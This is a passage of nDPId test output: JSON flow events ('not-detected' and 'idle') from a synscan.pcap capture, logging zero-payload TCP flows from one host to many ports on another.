+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
